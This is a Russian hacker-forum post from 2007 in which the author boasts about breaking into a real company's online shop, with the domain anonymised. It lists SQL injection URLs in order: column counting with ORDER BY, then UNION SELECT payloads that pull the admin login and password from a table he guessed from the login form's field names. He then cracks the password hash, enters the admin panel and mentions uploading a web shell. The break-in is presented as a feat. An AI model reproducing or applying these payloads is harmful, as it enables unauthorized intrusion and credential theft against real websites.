ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Новогодний взлом!
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

Новогодний взлом!
  #1  
Старый 26.12.2007, 15:16
fly
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме:
967842

Репутация: 251


Отправить сообщение для fly с помощью ICQ
Cool Новогодний взлом!
Короче дело было на днях. Пришел с работы и полез в сеть. Искал юизби винт (подарок другу). И попал на сайт одной известной конторы в моем любимом городе.
Название не буду называть дабы не вызывать интереса юного скрипт-кидиса. Можно добавить, что фирма, где я работаю постоянно обращ. к ним за комплект..
Кликнул на Продукция и попал в меню выбора продукции, но тут мое внимание удалилось в строку браузера.

Код:
http://comp.com/x.php?ProdID=916
Ну и типично я решил проверить на скуль. Поставил заветную кавычку и получил скуль, правда без каких либо ошибок.

Далее

Код:
http://comp.com/x.php?ProdID=916+order+by+1,2,3,4,5/*
Затем возник проблемс , который был решен

Код:
http://comp.com/x.php?ProdID=-916+union+select+1,2,3,4,5/*
Ничего что надо не вывело, ну сразу нашел выход

Код:
http://comp.com/x.php?ProdID=916+and+1=0+union+select+1,2,3,4,5,6/*
Версия мускула была 4 . Осталось подобрать таблиц и вывести заветный пасс админа, т.к . админка уже была найдена.
Хочу добавить, что данный скрипт был написан очень якобы крутой и дорогой конторой за неплохие деньги как потом выяснилось!!!!))))))))))))))

Но при подборе вышел небольшой обломс. Я решил забить, решил стукнуть за помощью на ачат, но прошелся лесов, кста привет и спасибо Termin@L за поддержку.

Сутки прошли, но результатов 0% даже после прогона по словарю предпол. таблиц.

Дальше самое интересно!! Решил зайти в админку, ввел типично admin:admin прошелся в тундру, но решил проверить html код страницы :

Код:
  <td class=TableRow1 align=right><input type="text" class=txt name="AdminName" value=""></td>
 </tr>
 <tr>
  <td class=TableRow1>Пароль:</td>
  <td class=TableRow1 align=right><input type="password" class=txt name="AdminPWD"></td>
 </tr>
 <tr>

  <td class=TableRow1 colspan="2" align=right><hr size=1><input type="submit" class=but value="Войти"></td>

И что остается только хлопать ушами от радости
AdminPWD--- таблица с паролем админа, ну и аналогично AdminName-- его логин.

Запрос выглядел след. образом:

Код:
http://comp.com/x.php?ProdID=916+and+1=0+union+select+1,name,3,password,5,6+from+AdminPWD+limit+0,1/*
ПОлучил des пароль. После подбора успешно залогонился в админку , были траблы с заливом шелла , но затем вопрос был решен.


Поздравляю все С НОВЫМ ГОДОМ. Мемберы ачата здоровья вам , меньше мазалей на заднице и успешных тем!!!!!
 
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Новогодний конкурс Че Гевара Болталка 100 11.12.2009 20:41
Взлом LiTO.ru ZaCo Авторские статьи 5 16.10.2005 23:29



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ